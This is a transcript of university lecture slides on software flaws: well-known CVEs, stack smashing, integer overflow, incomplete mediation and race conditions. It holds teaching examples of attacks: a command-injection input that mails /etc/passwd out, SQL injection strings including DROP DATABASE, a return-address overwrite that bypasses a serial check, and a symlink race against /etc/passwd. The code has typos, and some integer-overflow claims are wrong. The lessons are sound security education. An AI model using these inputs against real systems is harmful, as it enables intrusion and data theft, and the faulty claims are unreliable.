introduction to software security software...
TRANSCRIPT
Seong-je Cho
Spring 2018
Computer Security & Operating Systems Lab, DKU
Introduction to Software Security
Software Flaws(chapter 11)
- 2 -
Sources / References
Textbook
N. Vlajic, CSE 3482: Introduction to Computer Security, Yorku
Nicholas Weaver, Computer Science 161: Computer Security, Berkeley
Myrto Arapinis, Computer Security: INFRA10067, University of Edinburgh
2011 CWE/SANS Top 25 Most Dangerous Software Errors
Lecture 12 Program Security, CS 450/650 Lecture
Please do not duplicate and distribute
Computer Security & OS Lab, DKU
- 3 -
Contents
Software Security Issues
The 10 Worst Vulnerabilities of the last 10 years – Dark Reading
Software Bug/Flaw/Vulnerability
Buffer Overflows
Stack Buffer Overflows = Stack Smashing
Integer Overflows
Incomplete Mediation
Race Conditions, Format String Bugs
Computer Security & OS Lab, DKU
- 4 -
Why Software?
Why is software as important to security as crypto, access control and protocols? Virtually all of information security is implemented in software
If your software is subject to attack, your security is broken Regardless of strength of crypto, access control or protocols
Software is a poor foundation for security
Software Flaws = Software Vulnerability
Software Weakness
Computer Security & OS Lab, DKU
- 5 -
Bad Software
Bad software is everywhere! NASA Mars Lander (cost $165 million)
Crashed into Mars
Error in converting English and metric units of measure
Denver airport (in 1994)
Buggy baggage handling system
Delayed airport opening by 11 months
Cost of delay exceeded $1 million/day
MV-22 Osprey: Advanced military aircraft
Lives have been lost due to faulty software
Computer Security & OS Lab, DKU
- 6 -
SW bugs can prove deadly
Gamers May Fight Deadly Software Bugs in US Military Weapons [Jan. 23 2012, Technews]
a lesson learned when a buggy Patriot missile defense system failed to intercept a Scud missile that killed 28 American soldiers during the first Gulf War in 1991.
To prevent such weapons disasters, the U.S. military wants to transform dull bug-hunting tasks into fun problem-solving games that attract swarms of online players
Bug can cause deadly failures when anesthesia device is connected to cell phones [Apr. 23 2014, ars-technica]
Federal safety officials have issued an urgent warning about software defects in an anesthesia delivery system that can cause life-threatening failures at unexpected times, including when a cellphone or other device is plugged into one of its USB ports.
Spacelabs Healthcare is recalling the ARKON Anesthesia System with Version 2.0 Software due to a software defect.
anesthesia: 마취, 무감각증,
Computer Security & OS Lab, DKU
The 10 Worst Vulnerabilities of The Last 10 Years
(Dark Reading, 5/6/2016)
See also “The 5 Most Dangerous Software Bugs of 2014”
Computer Security & OS Lab, DKU
- 8 -
OpenSSL Heartbleed Vulnerability (CVE-2014-0160)
The Heartbleed Bug in the OpenSSL cryptographic library exposedSSL-based websites and software to attacks that would have allowed information theft on an unprecedented scale.
Nearly one-third of all major websites were believed vulnerable to the issue when Heartbleed was first disclosed in April 2014.
Because the vulnerability existed in the SSL/TLS encryption that websites and software use to protect information, the bug gave attackers an opportunity to eavesdrop on Web traffic, spoof users and servers and steal data directly from them.
Computer Security & OS Lab, DKU
- 9 -
Shellshock (CVE-2014-6271)
GNU Bash Remote Code Execution Vulnerability
Shellshock affected most versions of Unix, Linux and Mac OS X and allowed attackers to execute malicious code on vulnerable systems.
Some analysts estimated that nearly half a billion Internet connected devices and web servers were vulnerable to the issue at the time the bug was disclosed, including web servers, Android devices, OpenBSD, DHCP clients, SSH servers and Mac OSX devices.
Computer Security & OS Lab, DKU
- 10 -
Stagefright Vulnerabilities: CVE-2015-1538,CVE-2015-1539,CVE-2015-3824
multiple remotely executable vulnerabilities in Android’s Stagefrightmultimedia framework library pushed Google into instituting a monthly patch release process for Android and put pressure on other handset makers to do the same.
The flaws, in a core Android component that handles all video and audio files and provides playback facilities, affected all versions of Android going back to Froyo and impacted nearly a billion Android devices.
Stagefright basically gave attackers armed with only a victims’ phone number, a way to use specially crafted MMS messages to execute malicious code on vulnerable devices.
The vulnerabilities did not require the victim to take any action in order in order for malicious code to be executed on their devices.
The flaws have been described as by far the worse ever to hit Android to date.
Google has patched dozens of vulnerabilities in the media-sever component since Zimperium’s original vulnerability disclosure.
Computer Security & OS Lab, DKU
- 11 -
SSL 3.0 Protocol Vulnerability and POODLE Attack (CVE-2014-3566)
The SSL 3.0 Protocol Vulnerability and associated Padded Oracle on Downgraded Legacy Encryption (POODLE) exploit of 2014 stemmed from an implementation weakness in the SSL 3.0 protocol related to the encryption of whole data blocks.
The weakness gives attackers a way to break encrypted communications between a Web server and client browser and to steal authentication cookies and other data.
The POODLE attack basically demonstrated how threat actors could take advantage of a backwards-compatibility feature built into SSL/TSL to force browsers and web servers to use the vulnerable SSL 3.0 protocol and thereby break encrypted communications.
While SSL 3.0 is an old encryption standard and has generally been replaced by TLS, most SSL/TLS implementations remain backwards compatible with SSL 3.0 to interoperate with legacy systems in the interest of a smooth user experience.
Computer Security & OS Lab, DKU
- 12 -
Remote Code Execution Vulnerability in MS Server Service (CVE-2008-4250)
This buffer overflow vulnerability in the Server Service in multiple versions of Windows including Windows 2000 SP4, XP SP2 and SP3 and Server 2008 gave attackers a way to remotely execute malicious code on vulnerable systems using specially crafted remote procedure call.
What made the flaw dangerous was the fact that attackers could run arbitrary code on vulnerable systems without any authentication.
Computer Security & OS Lab, DKU
- 13 -
glibc: getaddrinfo stack-based buffer overflow (CVE-2015-7547)
Earlier this year, security researchers at Google and Red Hat disclosed a critical buffer overflow vulnerability in the GNU C Library (glibc) used by all major Linux distributions.
The flaw existed in a DNS client-side resolver in glibc, and was exploitable through the use of a particular function called getaddrinfo().
It allowed attackers to use DNS servers or domains in their control to essentially takeover systems and applications running the flawed software.
All major Linux distributions and the glibc project have issued patches for the problem.
Computer Security & OS Lab, DKU
- 14 -
Bad USB
Its implications are broad and scary all the same considering the ubiquitous use of USBs, according to researchers from Germany-based Security Research Labs who first raised the issue in a Black Hat presentation in 2014.
The researchers showed how it is possible for attackers to convert a benign USB device into a malicious one by quietly reprogramming its controller chip through a firmware update.
According to the researchers, widely used USB controller chips, such as those used in thumb drivers are not protected against such modification.
Reprogrammed USB devices can be used to surreptitiously carry out a slew of malicious tasks including stealing data and files, installing malware, redirecting traffic and infecting other USB devices.
Computer Security & OS Lab, DKU
Software Security Issues(Software Bugs)
Computer Security & OS Lab, DKU
- 16 -
Threats of Insecure Software
Successful exploitation of insecure software can lead to data breach and information leakage (confidentiality exposure), modification or alteration of data (integrity exposure) and/or defacement, downtime, and denial of service (availability exposure), besides financial loss.
Undetected and surreptitious exploitation can also lead to implantation of malicious software (Malware) within your organization, giving the malicious attacker both the ability and potential to attack any time, even perpetually.
Surreptitious: 은밀한, 슬쩍하는
Perpetually: 영구히, 영속적으로
Computer Security & OS Lab, DKU
- 17 -
Software Issues
“Normal” users Find bugs and flaws by accident
Hate bad software…
… but must learn to live with it
Must make bad software work
Computer Security & OS Lab, DKU
Attackers Actively look for bugs and flaws
Like bad software…
… and try to make it misbehave
Attack systems thru bad software
- 18 -
Complexity
“Complexity is the enemy of security”, Paul Kocher, Cryptography Research, Inc.
Computer Security & OS Lab, DKU
A new car contains more LOC than was required to land the Apollo astronauts on the moon
Netscape 17,000,000
Space shuttle 10,000,000
Linux 1,500,000
Windows XP 40,000,000
Boeing 777 7,000,000
System Lines of code (LOC)
- 19 -
Lines of Code and Bugs
Conservative estimate: 5 bugs/1000 LOC
Do the math Typical computer: 3,000 exe’s of 10K each
Conservative estimate of 50 bugs/exe
About 3K X 50 = 150K bugs per computer
30,000 node network has 4.5 billion bugs
Suppose that only 10% of bugs security-critical and only 10% of those remotely exploitable
Then “only” 45 million critical security flaws!
Computer Security & OS Lab, DKU
- 20 -
Software Security Topics
Program flaws (unintentional)
Buffer overflow
Incomplete mediation
Race conditions
Malicious software (intentional)
Viruses
Worms
Other breeds of malware
Computer Security & OS Lab, DKU
- 21 -
Program Flaws
An error오류 is a programming mistake To err is human
An error may lead to incorrect state: fault결점
A fault is internal to the program
A fault may lead to a failure실패, where a system departs from its expected behavior A failure is externally observable
Computer Security & OS Lab, DKU
Error Fault Failure
- 22 -
Example
This program has an error
This error might cause a fault
Incorrect internal state
If a fault occurs, it might lead to a failure
Program behaves incorrectly (external)
We use the term flaw결함 for all of the above
Computer Security & OS Lab, DKU
char array[10];
for(i = 0; i < 10; ++i)
array[i] = `A`;
array[10] = `B`;
- 23 -
Program Flaws
Program flaws are unintentional But still create security risks
We’ll consider 3~4 types of flaws Buffer overflow (smashing the stack)
Integer overflow
Incomplete mediation
Race conditions (?)
Many other flaws can occur
These are most common
Computer Security & OS Lab, DKU
- 24 -
Secure Software
In software engineering, try to insure that a program does what is intended
Secure software engineering requires that the software does what is intended… …and nothing more
Absolutely secure software is impossible
Absolute security is almost never possible!
How can we manage the risks?
Computer Security & OS Lab, DKU
Buffer Overflow (BoF)
Computer Security & OS Lab, DKU
- 26 -
Example Vulnerable C Program
Computer Security & OS Lab, DKU
#define MAX_LEN 10
int unsafe ( char *a, char *b ) {
char t[MAX_LEN];
strcpy (t, a);
strcat (t, b);
return strcmp (t, “abc”);
}
unsafe(“123”, “abc”);
unsafe(“1234567”, “890abcdef”);
- 27 -
An Unsafe Program
Computer Security & OS Lab, DKU
#include <limits.h>
int i;
unsigned int j;
i = INT_MAX; // 2,147,483,647
i++;
printf (“i = %d \n”, i);
j = UNIT_MAX; // 4,294,967,295
j++;
printf (“j = %u \n”);i = -2,147,483,648
j = 0
- 28 -
Another Example
Computer Security & OS Lab, DKU
- 29 -
1988: Morris Internet Worm
fingerd.c:
char line[512];
…
line[0] = ’\0’;
gets(line);
Results in 6,000 computers being infected.
Fingerd bug fix
memset(line,0,sizeof(line));
fgets(line,sizeof(line),stdin);
Computer Security & OS Lab, DKU
- 30 -
String Null Termination Errors #1
Computer Security & OS Lab, DKU
1. int main (int argc, char *argv[]) {
2. char cmdline [4096];
3. cmdline[0] = ‘\0’; // 없다면 ??
4.
5. for (int i = 1; i < argc; ++i) {
6. strcat (cmdline, argv [i]);
7. strcat (cmdline, “ ”);
8. }
9. /* … */
10. return 0;
11. }
30Computer security & OS lab, DKU
strcat – append a string to another
ptr = strcat (s1, s2);
• Both strings “s1” and “s2” must be terminated by the usual ‘\0’ character.
- 31 -
String Null Termination Errors #2
Computer Security & OS Lab, DKU
1 char ∗string_data ;
2 char a[16] ;
3 /∗ . . . ∗/
4 strncpy (a , string_data, sizeof( a ) ) ;
How many problems are there?
If string_data is NULL, …
If the length of string_data is greater than the size of a, …
- 32 -
Null-Termination Errors
Another common problem with C-style strings is a failure to properly null terminate
int main(int argc, char* argv[]) {
char a[16];
char b[16];
char c[32];
strncpy(a, "0123456789abcdef", sizeof(a));
strncpy(b, "0123456789abcdef", sizeof(b));
strncpy(c, a, sizeof(c));
}
Computer Security & OS Lab, DKU
Neither a[] nor b[] are properly terminated
- 33 -
Passing Strings to Complex Subsystems
Improper Data Sanitization
● An application inputs an email address from a user and writes the address to a buffer [Viega 03]
1. sprintf (buffer, “/bin/mail %s < /tmp/email”, addr);
2. system (buffer);
Normal input: [email protected]
What if: [email protected]; cat /etc/passwd | mail [email protected]
[Viega 03] Viega, J., and M. Messier. Secure Programming Cookbook for C and C++: Recipes for Cryptography, Authentication, Networking, Input Validation & More. Sebastopol, CA: O'Reilly, 2003.
Computer Security & OS Lab, DKU
- 34 -
Typical Attack Scenario
1. Users enter data into a Web form
2. Web form is sent to server
3. Server writes data to buffer, without checking length of input data
4. Data overflows from buffer
Sometimes, overflow can enable an attack
Web form attack could be carried out by anyone with an Internet connection
Computer Security & OS Lab, DKU
- 35 -
Buffer Overflow
Q: What happens when this is executed?
A: Depending on what resides in memory at location “buffer[20]” and “buffer[30]”
Might overwrite user data or code
Might overwrite system data or code
Computer Security & OS Lab, DKU
int main(){
int arr[10];
int buffer[10];
buffer[20] = 37;
buffer[30] = 58;}
- 36 -
Simple Buffer Overflow
Consider boolean flag for authentication
Buffer overflow could overwrite flag allowing anyone to authenticate!
Computer Security & OS Lab, DKU
In some cases, attacker need not be so lucky as to have overflow overwrite flag
buffer
FF O U R S C …
Boolean flag
- 37 -
Simple Buffer Overflow
Consider boolean flag for authentication
Buffer overflow could overwrite flag allowing anyone to authenticate!
Computer Security & OS Lab, DKU
In some cases, attacker need not be so lucky as to have overflow overwrite flag
buffer
FTF O U R S C …
Boolean flag
- 38 -
Memory Organization
Text == code
Data == static variables
Heap == dynamic data
Stack == “scratch paper” Dynamic local variables
Parameters to functions
Return address
Computer Security & OS Lab, DKU
stack
heap
data
text
high address
low address
SP
Simplified Stack Example
Chapter 11 Software flaws and malware
high
void func(int a,
int b){
char buffer[10];
}
void main(){
func(1, 2);
}
::
low
3
Simplified Stack Example
Chapter 11 Software flaws and malware
high
void func(int a,
int b){
char buffer[10];
}
void main(){
func(1, 2);
}
::
buffer
ret
a
b
low
SP
SP
SP
SP
3
Simplified Stack Example
Chapter 11 Software flaws and malware
high
void func(int a,
int b){
char buffer[10];
}
void main(){
func(1, 2);
}
::
buffer
ret
a
b
returnaddress
low
3
Smashing the Stack
Chapter 11 Software flaws and malware
high
What happens if buffer overflows?
::
buffer
a
b
low
ret
3
SP
SP
SP
SP
Smashing the Stack
Chapter 11 Software flaws and malware
high
What happens if buffer overflows?
::
buffer
b
low
3
SP
SP
SP
SP
overflow
overflow
Smashing the Stack
Chapter 11 Software flaws and malware
high
What happens if buffer overflows?
::
buffer
b
ret…
low
Program “returns” to wrong location
NOT!
???
A crash is likely
3
overflow
overflow
Stack Smashing Example
Program asks for a serial number that the attacker does not know
Attacker also does not have source code Attacker does have the executable (exe)
Chapter 11 Software flaws and malware
Program quits on incorrect serial number
45
Stack Smashing Example
By trial and error, attacker discovers an apparent buffer overflow
Chapter 11 Software flaws and malware
Note that 0x41is “A”
Looks like retoverwritten by 2 bytes!
46
Stack Smashing Example
Next, disassemble bo.exe to find
Chapter 11 Software flaws and malware
The goal is to exploit buffer overflow to jump to address 0x401034
47
Stack Smashing Example
Find that 0x401034 is “@^P4” in ASCII
Chapter 11 Software flaws and malware
Byte order is reversed? Why?
X86 processors are “little-endian”
48
Stack Smashing Example
Reverse the byte order to “4^P@” and…
Chapter 11 Software flaws and malware
Success! We’ve bypassed serial number check by exploiting a buffer overflow
Overwrote the return address on the stack
49
Stack Smashing Example
Attacker did not require access to the source code
Only tool used was a disassembler to determine address to jump to Can find address by trial and error
Necessary if attacker does not have exe
For example, a remote attack
Chapter 11 Software flaws and malware 50
Stack Smashing Example
Source code of the buffer overflow
Chapter 11 Software flaws and malware
Flaw easily found by attacker
Even without the source code!
51
- 52 -
Stack Smashing Prevention
1st choice: employ non-executable stack“No execute” NX bit (if available)
Seems like the logical thing to do, but some real code executes on the stack! (Java does this)
2nd choice: use safe languages (Java, C#)
3rd choice: use safer C functionsFor unsafe functions, there are safer versions
For example, strncpy / strlcpy instead of strcpy
Computer Security & OS Lab, DKU
- 53 -
Example Vulnerable C Program Fix
Computer Security & OS Lab, DKU
#define MAX_LEN 10
int unsafe ( char *a, char *b ) {
char t[MAX_LEN];
strcpy (t, a);
strcat (t, b);
return strcmp (t, “abc”);
}
unsafe(“1234567”, “890abcdef”);
Integer Overflow
Computer Security & OS Lab, DKU
- 55 -
Integer Overflow Examples
Example 1
#include <stdio.h>
int main(void){
unsigned int num = 0xffffffff;
printf("num = %u (0x%x)\n", num, num);
printf("num + 1 = 0x%x\n", num + 1);
return 0;
}
/* EOF */
The output of this program looks
like this:
num = 4294967295 (0xffffffff)
num + 1 = 0x0
Example 2
#include <stdio.h>
int main(void){
int n;
n = 0x7fffffff;
printf(“n = %d (0x%x)\n", n, n);
printf(“n + 1 = %d (0x%x)\n", n + 1 , n+1);
return 0;
}
/* EOF */
The output of which is:
n = 2147483647 (0x7fffffff)
n + 1 = -2147483648 (0x80000000)
- 56 -
Integer Overflow Errors: Addition/Subtraction/Multiplication
Computer Security & OS Lab, DKU
1. unsigned int ui1, ui2 , usum ;
2.
3. /∗ Initialize ui1 and ui2 ∗/
4.
5. usum = ui1 + ui2 ;
UINT_MAX = ?
INT_MAX = ?
INT_MIN = ?
sizeof (signed int) = ?
1. signed int si1 , si2 , result;
2.
3. /∗ Initialize si1 and si2 ∗/
4.
5. result = si1 * si2 ;
1. signed int si1, si2, result;
2.
3. /* initialize si1 and si2 */
4.
5. result = si1 – si2;
- 57 -
Integer Ranges
Example integer ranges
Computer Security & OS Lab, DKU
- 58 -
Integer Overflow
Computer Security & OS Lab, DKU
- 59 -
Integer Underflow
Computer Security & OS Lab, DKU
- 60 -
Integer overflow
The size of int is depending on the architecture.● So on i386 arch (32-bit) the int is 32-bits
● if this value can be controlled and a value is submitted that is larger in size than 32 bits we will successfully overflow memory.
So according in C the maximum size of a signed int is INT_MAX = 2147483647,
The maximum size of an unsigned int is UINT_MAX = 4294967295 (0xffffffff),
if a value is larger than the INT_MAX is used it will trigger a segmentation fault.
Computer Security & OS Lab, DKU
- 61 -
Integer underflow
if the integer value used is less than the minimum signed or unsigned int.
This is called an underflow and will also trigger a segmentation fault.
Because the binary unsigned int -4294967295 is similar to the binary representation of the signed int -1 in memory INT_MIN = -2147483647-1 UINT_MIN = -4294967295
Computer Security & OS Lab, DKU
Secure Coding
Fun with Integers
char x, y;
x = -128;
y = -x;
if (x == y) puts("1");
if ((x - y) == 0) puts("2");
if ((x + y) == 2 * x) puts("3");
if (((char)(-x) + x) != 0) puts("4");
if (x != -y) puts("5");
62Computer security & OS lab, DKU
Secure Coding
Type Conversion
Implicit Conversions
63Computer security & OS lab, DKU
Incomplete Mediation
Computer Security & OS Lab, DKU
- 65 -
Incomplete mediation
Failure to perform “sanity checks” on data can lead to random or carefully planned flaws.
Examples:
Impossible dates in correct format (say yyyyMMMdd):
1800Feb30, 2048Min32
What happens when these dates are looked up in tables in the program?
Alterable parameter fields in URL:
http://www.things.com/order/final&custID=101&part=555A&qy=20&pric
e=10&ship=boat&total=205
Web site adds parameters incrementally as transaction proceeds. User can change them
inconsistently.
Computer Security & OS Lab, DKU
- 66 -
Incomplete mediation
Inputs to programs are often specified by untrusted users
Web-based applications are a common example
Users sometimes mistype data in forms
Phone number: 51998884567
Email: iang#cs.uwaterloo.ca
An application needs to ensure that what user has entered constitutes a meaningful request
This is called mediation
Incomplete mediation occurs when the application accepts incorrect data from user
Sometimes this is hard to avoid
Phone number: 519-886-4567
This is a reasonable entry, that happens to be wrong
Computer Security & OS Lab, DKU
- 67 -
Incomplete mediation
We focus on catching entries that are clearly wrong
Not well formed
DOB: 1980-04-31
Unreasonable values
DOB: 1876-10-12
Inconsistent with other entries
Why do we care?
What happens if someone fills in:
DOB: 98764874236492483649247836489236492
» Buffer overflow?
DOB: '; DROP DATABASE clients --
» SQL injection?
We need to make sure that any user-supplied input falls within well-specified values
known to be safe
Computer Security & OS Lab, DKU
- 68 -
Incomplete Mediation
Sensitive data are in exposed, uncontrolled condition
Unchecked data are a serious vulnerability!
Possible scenarios
Supplying the wrong type of data being requested.
Supplying the wrong length of data being requested.
In a system, a user is allowed to edit input directly
In a system, a server does not check validity of data values received from client
In a system, a client returns a sensitive result (like total) that can be easily recomputed by server
Problems
System fails
Supply of Bad Data
Must be checked by programmer
Client side verses Server Side
Computer Security & OS Lab, DKU
- 69 -
Input Validation
Consider: strcpy(buffer, argv[1])
A buffer overflow occurs if
len(buffer) < len(argv[1])
Software must validate the input by checking the length of argv[1]
Failure to do so is an example of a more general problem: incomplete mediation 불완전중재
Computer Security & OS Lab, DKU
- 70 -
Input Validation
Consider web form data URL to be generated by client’s browser to access server.
GET and POST requests (Which is more secure?)
Suppose input is validated on client
For example, the following is validhttp://www.things.com/orders/final&custID=112&num=55A&qty=2
0&price=10&shipping=5&total=205
Suppose input is not checked on server Why bother since input checked on client?
Then attacker could send http messagehttp://www.things.com/orders/final&custID=112&num=55A&qty=2
0&price=10&shipping=5&total=25
User uses forged URL to access server
Computer Security & OS Lab, DKU
- 71 -
Incomplete Mediation
Linux kernel
Research has revealed many buffer overflows
Many of these are due to incomplete mediation
Linux kernel is “good” software since
Open-source
Kernel written by coding gurus
Tools exist to help find such problems
But incomplete mediation errors can be subtle
And tools useful to attackers too!
Computer Security & OS Lab, DKU
- 72 -
Incomplete Mediation (ex. SQL Injection)
John Fiore
SELECT * from CUSTOMERS
WHERE name = 'John Fiore'
- 73 -
Incomplete Mediation (ex. SQL Injection)
John Fiore' or '1'='1
SELECT * from CUSTOMERS
WHERE name = 'John Fiore'
OR '1'='1'
- 74 -
Client-side mediation
forms that do client-side mediation
When you click “submit”, Javascript code will first run validation checks on the data you entered
If you enter invalid data, a popup will prevent you from submitting it
Related issue: client-side state
Many web sites rely on the client to keep state for them
Put hidden fields in the form which are passed back to the server when user submits the form
Problem: what if the user
Turns off Javascript?
Edits the form before submitting it?
Writes a script that interacts with the web server instead of using a web browser at all?
Connects to the server “manually”?
telnet server.com 80
Note that the user can send arbitrary (unmediated) values to the server this way
The user can also modify any client-side state
Computer Security & OS Lab, DKU
- 75 -
Defenses
Client-side mediation is an OK method to use in order to have a friendlier user interface
but is useless for security purposes.
You have to do server-side mediation
whether or not you also do client-side
For values entered by the user
Always do very careful checks on the values of all fields
These values can potentially contain completely arbitrary 8-bit data and be of any length
For state stored by the client:
Make sure the client has not modified the data in any way
Computer Security & OS Lab, DKU
Race Conditions(Time-of-Check to Time-of-Use Errors)
Computer Security & OS Lab, DKU
- 77 -
Race Condition
Security processes should be atomic
Occur “all at once”
Race conditions can arise when security-critical process occurs in stages Race Condition errors are also known as TOCTTOU (“TOCK-too”) errors
Attacker makes change between stages
Often, between stage that gives authorization, but before stage that transfers ownership
Example: Unix mkdir
Computer Security & OS Lab, DKU
mkdir Race Condition
Chapter 11 Software flaws and malware
mkdir creates new directory How mkdir is supposed to work
1. Allocatespace
mkdir
2. Transferownership
78
mkdir Attack
Chapter 11 Software flaws and malware
Not really a “race” But attacker’s timing is critical
1. Allocatespace
mkdir
3. Transferownership
2. Create link topassword file
The mkdir race condition
79
- 80 -
Race Conditions
Race conditions are common
Race conditions may be more prevalent than buffer overflows
But race conditions harder to exploit
Buffer overflow is “low hanging fruit” today
To prevent race conditions, make security-critical processes atomic
Occur all at once, not in stages
Not always easy to accomplish in practice
Computer Security & OS Lab, DKU
- 81 -
Time-of-check to Time-of-use (TOCTTU)
A delay between checking permission to perform certain operations and using this permission may enable the operations to be changed.
Example:
1) User attempts to write 100 bytes at end of file “abc”.
Description of operation is stored in a data structure.
2) OS checks user’s permissions on copy of data structure.
3) While user’s permissions are being checked, user changes data structure to describe operation to delete file “xyz” .
Can you find further examples?
Computer Security & OS Lab, DKU
- 82 -
Summary, Q & A
Software bug
Software vulnerability
Software security vs. Software quality
Type conversion errors
Null pointer errors
Integer overflow/underflow
Format string bugs http://null-byte.wonderhowto.com/how-to/security-oriented-c-tutorial-0x14-format-string-vulnerability-part-i-buffer-
overflows-nasty-little-brother-0167254/
Computer Security & OS Lab, DKU
• What types of threat are related to this lecture?‒ Consider the STRIDE model !
- 83 -
Race Conditions: Example
• setuid allocates terminals to users
– a privileged operation
– supports writing contents of terminal to a log file
• first checks if the user has permissions to write to the requested file; if so, it opens the file for writing
• The attacker makes a symbolic link:
logfile -> file_he_owns
• Between the “check” and the “open”, he changes it:
logfile -> /etc/passwd
Computer Security & OS Lab, DKU
- 84 -
Race Conditions: The problem
• State of the system changed between the check for permission and the execution of operation
• File whose permissions were checked for writeability by the user (file_he_owns) wasn't the same file that was later written to (/etc/passwd)
– Even though they had the same name (logfile) at different points in time
Computer Security & OS Lab, DKU